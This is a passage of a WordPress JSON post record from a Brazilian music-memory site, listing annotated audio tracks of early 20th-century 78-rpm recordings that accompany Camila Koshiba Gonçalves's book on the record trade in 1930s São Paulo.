{"id":1696,"date":"2013-03-30T17:04:11","date_gmt":"2013-03-30T20:04:11","guid":{"rendered":"https:\/\/webprisma.com.br\/memoriadamusica\/?p=1696"},"modified":"2024-05-02T19:16:40","modified_gmt":"2024-05-02T22:16:40","slug":"musica-em-78-rotacoes-discos-a-todos-os-precos-na-sao-paulo-dos-anos-30-camila-koshiba-goncalves-sp-ed-alameda-2013","status":"publish","type":"post","link":"https:\/\/www.memoriadamusica.com.br\/index.php\/textos-e-audios\/livros\/musica-em-78-rotacoes-discos-a-todos-os-precos-na-sao-paulo-dos-anos-30-camila-koshiba-goncalves-sp-ed-alameda-2013\/","title":{"rendered":"M\u00fasica em 78 Rota\u00e7\u00f5es &#8211; &#8220;Discos a todos os pre\u00e7os&#8221; na S\u00e3o Paulo dos anos 30. Camila Koshiba Gon\u00e7alves. SP: Ed. Alameda. 2013."},"content":{"rendered":"\n<figure class=\"wp-block-image is-resized\"><img decoding=\"async\" src=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/Capa_Camila0001.jpg\" alt=\"Capa Camila0001\" style=\"width:198px;height:auto\"\/><\/figure>\n\n\n\n<p><br><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/index.php\/texto-e-audio\/34-musica-em-78-rotacoes#\"><\/a><\/p>\n\n\n\n<p><strong>\u00c1UDIO<\/strong><\/p>\n\n\n\n<p><strong>1. Introdu\u00e7\u00e3o<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/01-120589_Saci.mp3\">Faixa 1&nbsp;<\/a>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<\/p>\n\n\n\n<p><em>Saci<\/em>. Polca gravada pelo Grupo do Canhoto, disco Odeon n. 120589, de autoria de Jo\u00e3o Batista do Nascimento, lan\u00e7ada entre 1913 e 1915.<\/p>\n\n\n\n<p><strong>2. O disco&nbsp;no Brasil<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/02-33253-A_Prova_aprovada_do_Babaa-Miloqua.mp3\">Faixa 2&nbsp;<\/a>&nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/p>\n\n\n\n<p><em>Baba\u00f4 Miloqu\u00ea<\/em>. Batuque gravado por Josu\u00e9 de Barros e Orquestra Victor Brasileira, disco Victor n.33253-A, de autoria de Josu\u00e9 de Barros, lan\u00e7ado em janeiro de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/03-DPM_Tambor_de_crioulo_do_MA.mp3\">Faixa 3&nbsp;&nbsp;<\/a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p><em>Tambor de crioulo<\/em>. Disco da Discoteca P\u00fablica Municipal da S\u00e9rie Folcl\u00f3rica, n.28.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/04-33301-B_Mulambo.mp3\">Faixa 4<\/a><\/p>\n\n\n\n<p><em>Mulambo<\/em>. Samba, gravado pelo Silvio Caldas, disco Victor 33301-B, de autoria de Teobaldo Marques da Gama, lan\u00e7ado em agosto de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/05-7065_Guara%C2%A1.mp3\">Faixa 5<\/a><\/p>\n\n\n\n<p><em>Guar\u00e1<\/em>. Polca gravada pelo Choro Carioca, disco Phoenix n.70653, de autoria de Alfredo da Rocha Viana (Pixinguinha), lan\u00e7ada entre 1913-1918.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/06-801214-B_Rapaziada_do_Br.mp3\">Faixa 6<\/a><\/p>\n\n\n\n<p><em>Rapaziada do Br\u00e1s<\/em>. Valsa gravada pelo Jacob do Bandolim, disco Victor 801214-B, de autoria de Alberto Marino, lan\u00e7ada em 1953.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/07-Prova_recusada_do_Baba_Miloqu.mp3\">Faixa 7<\/a><\/p>\n\n\n\n<p>Prova recusada de&nbsp;<em>Baba\u00f4 Miloqu\u00ea<\/em>&nbsp;&#8211; Batuque gravado por Josu\u00e9 de Barros e Orquestra Victor Brasileira, de autoria de Josu\u00e9 de Barros, n\u00e3o-comercializado.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/08-Introducao_Babao.mp3\">Faixa 8<\/a><\/p>\n\n\n\n<p>Prova aceita de&nbsp;<em>Baba\u00f4 Miloqu\u00ea \u2013 \u201cIntrodu\u00e7\u00e3o\u201d<\/em>. Batuque gravado por Josu\u00e9 de Barros e Orquestra Victor Brasileira, disco Victor n.33253-A, de autoria de Josu\u00e9 de Barros, lan\u00e7ado em janeiro de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/09-Batuque_Babao.mp3\">Faixa 9<\/a><\/p>\n\n\n\n<p>Prova aceita de&nbsp;<em>Baba\u00f4 Miloqu\u00ea \u2013 \u201cBatuque\u201d<\/em>. Batuque gravado por Josu\u00e9 de Barros e Orquestra Victor Brasileira, disco Victor n.33253-A, de autoria de Josu\u00e9 de Barros, lan\u00e7ado em janeiro de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/10-Flautas_babao.mp3\">Faixa 10<\/a><\/p>\n\n\n\n<p>Prova aceita de&nbsp;<em>Baba\u00f4 Miloqu\u00ea \u2013 \u201cFlautas\u201d<\/em>. Batuque gravado por Josu\u00e9 de Barros e Orquestra Victor Brasileira, disco Victor n.33253-A, de autoria de Josu\u00e9 de Barros, lan\u00e7ado em janeiro de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/11-Encontro_Babao.mp3\">Faixa 11<\/a><\/p>\n\n\n\n<p>Prova aceita de&nbsp;<em>Baba\u00f4 Miloqu\u00ea \u2013 \u201cEncontro\u201d<\/em>. Batuque gravado por Josu\u00e9 de Barros e Orquestra Victor Brasileira, disco Victor n.33253-A, de autoria de Josu\u00e9 de Barros, lan\u00e7ado em janeiro de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/12-Dialogo_Babao.mp3\">Faixa 12<\/a><\/p>\n\n\n\n<p>Prova aceita de&nbsp;<em>Baba\u00f4 Miloqu\u00ea \u2013 \u201cDi\u00e1logo\u201d<\/em>. Batuque gravado por Josu\u00e9 de Barros e Orquestra Victor Brasileira, disco Victor n.33253-A, de autoria de Josu\u00e9 de Barros, lan\u00e7ado em janeiro de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/13-Retorno_Babao.mp3\">Faixa 13<\/a><\/p>\n\n\n\n<p>Prova aceita de&nbsp;<em>Baba\u00f4 Miloqu\u00ea \u2013 \u201cRetorno\u201d<\/em>. Batuque gravado por Josu\u00e9 de Barros e Orquestra Victor Brasileira, disco Victor n.33253-A, de autoria de Josu\u00e9 de Barros, lan\u00e7ado em janeiro de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/14-Intervencao_falada_Babao.mp3\">Faixa 14<\/a><\/p>\n\n\n\n<p>Prova aceita de&nbsp;<em>Baba\u00f4 Miloqu\u00ea \u2013 \u201cInterven\u00e7\u00e3o falada\u201d<\/em>. Batuque gravado por Josu\u00e9 de Barros e Orquestra Victor Brasileira, disco Victor n.33253-A, de autoria de Josu\u00e9 de Barros, lan\u00e7ado em janeiro de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/15-Prova_miuda_de_Babao_Miloque.mp3\">Faixa 15<\/a><\/p>\n\n\n\n<p>Prova mi\u00fada de&nbsp;<em>Baba\u00f4 Miloqu\u00ea<\/em>. Batuque gravado por Josu\u00e9 de Barros e Orquestra Victor Brasileira, de autoria de Josu\u00e9 de Barros, n\u00e3o-comercializado.<\/p>\n\n\n\n<p><strong>3. Os basbaques da vitrola<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/16-120596_Pisando_na_mala.mp3\">Faixa 16<\/a><\/p>\n\n\n\n<p><em>Pisando na mala<\/em>. Polca gravada pelo Canhoto, disco Odeon n.120596, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada entre 1913 e 1915.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/17-122933_Abismo_de_Rosas.mp3\">Faixa 17<\/a><\/p>\n\n\n\n<p><em>Abismo de rosas<\/em>. Valsa gravada pelo Canhoto, disco Odeon 122933, de autoria de Canhoto, lan\u00e7ada entre 1921 e 1926.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/18-120592_Tuim_Tuim.mp3\">Faixa 18<\/a><\/p>\n\n\n\n<p><em>Tuim-tuim<\/em>. Valsa gravada pelo Grupo do Canhoto, disco Odeon n.120592, de autoria de E. J. Peans, lan\u00e7ada entre 1913 e 1915.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/19-120885_La_Paloma.mp3\">Faixa 19<\/a><\/p>\n\n\n\n<p><em>La Paloma<\/em>. Habanera gravada por Giuseppe Rielli, disco Odeon n.120885, de autoria de Yradier, lan\u00e7ada entre 1913-1915.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/20-1037_Agonia_de_Artista.mp3\">Faixa 20<\/a><\/p>\n\n\n\n<p><em>Agonia de Artista<\/em>. Tango gravado pelo Arthur Castro, disco Imperador n. 1037-A, de autoria de A. Fernandez, lan\u00e7ado provavelmente em 1926.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/21-10230-A_Adios_mis_farras.mp3\">Faixa 21<\/a><\/p>\n\n\n\n<p><em>Adi\u00f3s mis farras<\/em>. Tango gravado pelo Francisco Alves, disco Odeon n.10230-A, de autoria de Raul Roulien, lan\u00e7ado em agosto de 1928.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/22-5049-A_Portero_suba_y_diga.mp3\">Faixa 22<\/a><\/p>\n\n\n\n<p><em>Portero suba y diga<\/em>. Tango gravado pela Luly M\u00e1laga, disco Columbia n.5049-A, de autoria de E. de Labar, lan\u00e7ado em julho de 1929.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/23-1041_Mamae_me_leva.mp3\">Faixa 23<\/a><\/p>\n\n\n\n<p><em>Mam\u00e3e me leva<\/em>. Maxixe gravado pelo Arthur Castro, disco Imperador 1041, de autoria de Nabor Pires Camargo e Dieno Castanho, provavelmente lan\u00e7ado em 1926.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/24-112639_Casaco_De_Mulata.mp3\">Faixa 24<\/a><\/p>\n\n\n\n<p><em>Casaco da mulata<\/em>. Samba gravado pela Orquestra Brasil-Am\u00e9rica, disco Odeon n.122604, de autoria de Careca, provavelmente lan\u00e7ado em 1924.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/25-122919_Trecho_de_Suspira_nega_suspira.mp3\">Faixa 25<\/a><\/p>\n\n\n\n<p><em>Suspira, nega, suspira (trecho)<\/em>. Maxixe gravado pelo Fernando, disco Odeon n. 122919, de autoria de Pedro de S\u00e1 Pereira, provavelmente lan\u00e7ado entre 1925 e 1926.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/26-122919_Suspira_nega_suspira.mp3\">Faixa 26<\/a><\/p>\n\n\n\n<p><em>Suspira, nega, suspira (completo)<\/em>. Maxixe gravado pelo Fernando, disco Odeon n. 122919, de autoria de Pedro de S\u00e1 Pereira, provavelmente lan\u00e7ado entre 1925 e 1926.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/27-10008-A_O_Pe_de_Anjo.mp3\">Faixa 27<\/a><\/p>\n\n\n\n<p><em>O P\u00e9 de Anjo<\/em>. Marcha carnavalesca gravada por Francisco Alves, disco Popular n.1008-A, de autoria de Sinh\u00f4, lan\u00e7ada entre fins de 1919 e in\u00edcio de 1921.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/28-5015-A_Fado_do_garoto_dos_jornais.mp3\">Faixa 28<\/a><\/p>\n\n\n\n<p><em>Fado do garoto dos jornais<\/em>. Fado gravado pelo Estevam Amarante, disco Columbia n. 5015-A, sem indica\u00e7\u00e3o de autoria, lan\u00e7ado em mar\u00e7o de 1929.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/29-4017-A_Em_ti_pensando.mp3\">Faixa 29<\/a><\/p>\n\n\n\n<p><em>Em ti pensando<\/em>. Valsa gravada pelo Alberto Marino, disco Arte-fone n. 4017-A, de autoria de Jos\u00e9 Rizzo, lan\u00e7ada entre 1931 e fins de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/30-3003-A_Celia.mp3\">Faixa 30<\/a><\/p>\n\n\n\n<p><em>C\u00e9lia.<\/em>&nbsp;Valsa gravada pelo Att\u00edlio Grany, disco Ouvidor n. 3003, de autoria de Att\u00edlio Grany, lan\u00e7ada em 1931.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/31-3003-B_la_vem_o_sol.mp3\">Faixa 31<\/a><\/p>\n\n\n\n<p><em>L\u00e1 vem o sol.<\/em>&nbsp;Choro gravado pelo Att\u00edlio Grany, disco Ouvidor n. 3003, de autoria de Att\u00edlio Grany, lan\u00e7ado em 1931.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/32-4004-A_Sofrer_sorrindo.mp3\">Faixa 32<\/a><\/p>\n\n\n\n<p><em>Sofrer Sorrindo<\/em>. Valsa gravada por Nabor Pires Camargo, disco Arte-fone n. 4004, de autoria de Nabor Pires Camargo, lan\u00e7ada entre 1931 e fins de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/33-4004-B_Bicho_Mau.mp3\">Faixa 33<\/a><\/p>\n\n\n\n<p><em>Bicho Mau<\/em>. Choro gravado por Nabor Pires Camargo, disco Arte-fone n. 4004, de autoria de Nabor Pires Camargo, lan\u00e7ado entre 1931 e fins de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/34-3017-A_Maria.mp3\">Faixa 34<\/a><\/p>\n\n\n\n<p><em>Maria.&nbsp;<\/em>Valsa gravada pelo Domingos Pecce, disco Ouvidor n. 3017, de autoria de Domingos Pecce, lan\u00e7ada em 1931.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/35-3017-B_De_cachimbo.mp3\">Faixa 35<\/a><\/p>\n\n\n\n<p><em>De cachimbo.&nbsp;<\/em>Choro gravado pelo Domingos Pecce, disco Ouvidor n. 3017, de autoria de Domingos Pecce, lan\u00e7ado em 1931.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/36-Manhoso3018-B.mp3\">Faixa 36<\/a><\/p>\n\n\n\n<p><em>Manhoso<\/em>. Choro gravado por Petit, Amador Pinho e Benedito Chaves, disco Arte-fone n. 4018, de autoria de Amador Pinho, lan\u00e7ado entre 1931 e fins de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/37-Genioso4018-B.mp3\">Faixa 37<\/a><\/p>\n\n\n\n<p><em>Genioso<\/em>. Choro gravado por Petit, Amador Pinho e Benedito Chaves, disco Arte-fone n. 4018, de autoria de Amador Pinho, lan\u00e7ado entre 1931 e fins de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/38-4021-A_Gauchita.mp3\">Faixa 38<\/a><\/p>\n\n\n\n<p><em>Gauchita<\/em>. Rancheira gravada pelo Amador Pinho, Petit e Benedito Chaves, disco Arte-fone n. 4021-A, de autoria de Amador Pinho, lan\u00e7ada entre 1931 e fins de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/39-5037-B_Serenata_de_Toselli.mp3\">Faixa 39<\/a><\/p>\n\n\n\n<p><em>Serenata de Toselli<\/em>. Sem indica\u00e7\u00e3o de g\u00eanero, gravada pelo Benedito Chaves, disco Columbia n. 5037-B, de autoria de Toselli e adapta\u00e7\u00e3o de Benedito Chaves, lan\u00e7ada em junho de 1929.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/40-4047-B_Os_tres_beijos.mp3\">Faixa 40<\/a><\/p>\n\n\n\n<p><em>Os tr\u00eas beijos<\/em>. Sem indica\u00e7\u00e3o de g\u00eanero, gravada pela Orquestra de Dan\u00e7as Arte-fone e canto pelo Ubirajara, disco Arte-fone n. 4074-B, de autoria de J. Portaro, lan\u00e7ada entre 1931 e fins de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/41-4085-A_Um_dois_tres.mp3\">Faixa 41<\/a><\/p>\n\n\n\n<p><em>Um, dois, tr\u00eas<\/em>. Marcha gravada pela Raquel de Freitas, disco Arte-fone n. 4085-A, de autoria de Martinez Grau (m\u00fasica) e C\u00e9sar Ladeira (letra), lan\u00e7ada entre 1931 e o carnaval de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/42-4048-A_Eu_me_iludi.mp3\">Faixa 42<\/a><\/p>\n\n\n\n<p><em>Eu me iludi<\/em>. Samba, gravado pelo Janu\u00e1rio de Oliveira, disco Arte-fone n. 4048-A, de autoria de Picol\u00e9, lan\u00e7ado entre 1931 e o carnaval de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/43-10128-A_Ora_vejam_so.mp3\">Faixa 43<\/a><\/p>\n\n\n\n<p><em>Ora vejam s\u00f3<\/em>. Samba gravado pelo Francisco Alves e Orquestra Pan American do Cassino Copacabana, disco Odeon n.10128-A, de autoria de Sinh\u00f4, lan\u00e7ado em maio de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/44-4110-A_Para_frente_paulistas.mp3\">Faixa 44<\/a><\/p>\n\n\n\n<p><em>Para frente paulistas!<\/em>&nbsp;Sem indica\u00e7\u00e3o de g\u00eanero, gravada por Orquestra Arte-fone, disco Arte-fone n. 4111, de autoria Zequinha de Abreu, lan\u00e7ada entre julho de 1932 e fins de 1932.<\/p>\n\n\n\n<p><strong>Simplicidades caipiras<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/45-11020-A_Festa_de_S._Joao_I.mp3\">Faixa 45<\/a><\/p>\n\n\n\n<p><em>Festa de S\u00e3o Jo\u00e3o \u2013 I<\/em>. Cena regional gravada pelo Bando de Tangar\u00e1s, disco Odeon n. 11020-A, de autoria de Jo\u00e3o de Barro, lan\u00e7ada em junho de 1933.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/46-11020-B_Festa_de_S._Joao_II.mp3\">Faixa 46<\/a><\/p>\n\n\n\n<p><em>Festa de S\u00e3o Jo\u00e3o \u2013 II<\/em>. Cena regional gravada pelo Bando de Tangar\u00e1s, disco Odeon n. 11020-A, de autoria de Jo\u00e3o de Barro, lan\u00e7ada em junho de 1933.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/47-33937-B_Sto_Antonio_S_Pedro_e_S_Joao.mp3\">Faixa 47<\/a><\/p>\n\n\n\n<p><em>Santo Ant\u00f4nio, S\u00e3o Pedro e S\u00e3o Jo\u00e3o<\/em>. Marcha gravada pela Araci de Almeida, disco Victor n. 33937-B, de autoria de Bide e Herivelto Martins, lan\u00e7ada em junho de 1935.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/48-5092-B_Saia_do_sereno.mp3\">Faixa 48<\/a><\/p>\n\n\n\n<p><em>Saia do sereno<\/em>. Toada gravada pela Stefana de Macedo, disco Columbia n. 5095-B, motivo popular com arranjo de Stefana de Macedo, lan\u00e7ada em outubro de 1929.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/49-5093-B_Historia_de_uma_triste_praieira.mp3\">Faixa 49<\/a><\/p>\n\n\n\n<p><em>Hist\u00f3ria de uma triste praieira<\/em>. Can\u00e7\u00e3o, gravada pela Stefana de Macedo, disco Columbia 5093-B, motivo popular, arranjo Stefana de Macedo, lan\u00e7ada em outubro de 1929.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/50-5093-A_Batuque.mp3\">Faixa 50<\/a><\/p>\n\n\n\n<p><em>Batuque (Dan\u00e7a Quilombo dos Palmares)<\/em>. Sem indica\u00e7\u00e3o de g\u00eanero, disco Columbia n. 5093-A, motivo popular com arranjo de Stefana de Macedo, lan\u00e7ado em outubro de 1929.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/51-15411-A_Perdao_Emilia.mp3\">Faixa 51<\/a><\/p>\n\n\n\n<p><em>Perd\u00e3o, Em\u00edlia!<\/em>&nbsp;Modinha gravada pelo Paraguassu, acompanhado pelo Rago e Seu Conjunto, sem indica\u00e7\u00e3o de autoria, disco Continental n. 15411-A, lan\u00e7ada em agosto de 1945.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/52-22183-B_Violeiro_do_lua.mp3\">Faixa 52<\/a><\/p>\n\n\n\n<p><em>Viol\u00earo do lu\u00e1<\/em>. Can\u00e7\u00e3o regional, gravada pelo Paragussu, acompanhado pelo Grupo Verde e Amarelo, disco Columbia n. 22183-B, de autoria de A. Fleury (letra) e Paraguassu (m\u00fasica), lan\u00e7ado em janeiro de 1933.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/53-12863-A_Casa_de_Caboclo.mp3\">Faixa 53<\/a><\/p>\n\n\n\n<p><em>Casa de caboclo<\/em>. Can\u00e7\u00e3o gravada pelo Gast\u00e3o Formenti, disco Parlophon n. 12863-A, de autoria de Heckel Tavares e Luiz Peixoto, lan\u00e7ada em novembro de 1928.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/54-140_Monoogo_Caipira.mp3\">Faixa 54<\/a><\/p>\n\n\n\n<p><em>Mon\u00f3logo caipira<\/em>. Mon\u00f3logo gravado pelo Batista Jr., disco Phoenix n. 140, de autoria de Batista Jr., lan\u00e7ada provavelmente entre 1913-1918.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/55-X-772_A_Peste_Bubonica__Por_Um_Caipira_.mp3\">Faixa 55<\/a><\/p>\n\n\n\n<p><em>A peste bub\u00f4nica<\/em>. Mon\u00f3logo recitado pelo Bahiano, disco Zon-0-Phone n. X-772, sem indica\u00e7\u00e3o de autoria, lan\u00e7ado provavelmente entre 1902-1908.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/56-5030-B_o_de_casa.mp3\">Faixa 56<\/a><\/p>\n\n\n\n<p><em>\u00d4, de casa!<\/em>&nbsp;Prosa sertaneja gravada pelo Batista Jr., disco Columbia n. 5030-B, de autoria de Batista Jr., lan\u00e7ada em outubro de 1928.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/57-20047-B_Qui-pro-quo_Trecho_1.mp3\">Faixa 57<\/a><\/p>\n\n\n\n<p><em>Qui-pro-qu\u00f3 (trecho)<\/em>. Anedota gravada pelo Corn\u00e9lio Pires, disco Columbia n. 20047-B, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada provavelmente em 1930.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/58-20015-B_So_cabocro_brasileiro.mp3\">Faixa 58<\/a><\/p>\n\n\n\n<p><em>S\u00f4 cabocro brasilero<\/em>. Moda de viola gravada pelo Mariano e pelo Ca\u00e7ula, disco Columbia n. 20015-B, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada, provavelmente, em fins de 1929, in\u00edcio de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/59-8204_Um_catereto_na_roca.mp3\">Faixa 59<\/a><\/p>\n\n\n\n<p><em>Um cateret\u00ea na ro\u00e7a<\/em>. Bate-p\u00e9 gravado pelo Arlindo Santana e dan\u00e7ador, disco Columbia n. 8204-A, de autoria de Arlindo Santana, provavelmente lan\u00e7ado em 1936.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/60-33441-A_Desafio.mp3\">Faixa 60<\/a><\/p>\n\n\n\n<p><em>Desafio<\/em>. Desafio gravado pelo Laureano e pelo Soares, disco Victor n. 33441-A, de autoria de Laureano e Soares, lan\u00e7ado em maio de 1931.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/61-33235-A_Caterete.mp3\">Faixa 61<\/a><\/p>\n\n\n\n<p><em>Cateret\u00ea<\/em>. Dan\u00e7a T\u00edpica gravada pela Turma Caipira Victor, disco Victor n. 33235-A, de autoria de Oleg\u00e1rio de Godoy (Sorocabinha), lan\u00e7ada em dezembro de 1929.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/62-33922-B_Triste_Festa_De_Sao_Joao.mp3\">Faixa 62<\/a><\/p>\n\n\n\n<p><em>Triste festa de S\u00e3o Jo\u00e3o<\/em>. Moda de viola gravada pelo Oleg\u00e1rio e pelo Louren\u00e7o, disco Victor n. 33922-B, de autoria de M. R. Louren\u00e7o, lan\u00e7ada em abril de 1935.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/63-41214-A_Trecho_de_Pra_que_sodade.mp3\">Faixa 63<\/a><\/p>\n\n\n\n<p><em>Pra que sodade (trecho)<\/em>. Moda de viola gravada pelo Bas\u00edlio Monteiro e pela No\u00eamia Monteiro, disco Arte-fone, n. 4124, de autoria de Bas\u00edlio Monteiro, lan\u00e7ada entre 1931 e fins de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/64-20022-A_Trecho_de_Bigode_raspado.mp3\">Faixa 64<\/a><\/p>\n\n\n\n<p><em>Bigode raspado (trecho)<\/em>. Moda de viola gravada pelo Mariano e pelo Ca\u00e7ula, disco Columbia n. 22022-A, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada em junho de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/65-4124-B_Trecho_de_Prende_os_cabritinho.mp3\">Faixa 65<\/a><\/p>\n\n\n\n<p><em>Prende os cabritinho (trecho)<\/em>. Moda de viola gravada pelo Bas\u00edlio e pela No\u00eamia Monteiro, disco Arte-fone 4024-A, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada entre 1931 e fins de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/66-20001-A_Trecho_de_Rebatidas_de_caipiras.mp3\">Faixa 66<\/a><\/p>\n\n\n\n<p><em>Rebatidas de caipiras (trecho)<\/em>. Anedota gravada pelo Corn\u00e9lio Pires, disco Columbia n. 20001-A, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada em maio de 1929.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/67-4019_O_cravo.mp3\">Faixa 67<\/a><\/p>\n\n\n\n<p><em>O cravo<\/em>. Moda de viola gravada pelo Laureano e pelo Soares, disco Arte-fone n. 4019, de autoria de Ochelsis Laureano, lan\u00e7ada entre 1931 e fins de 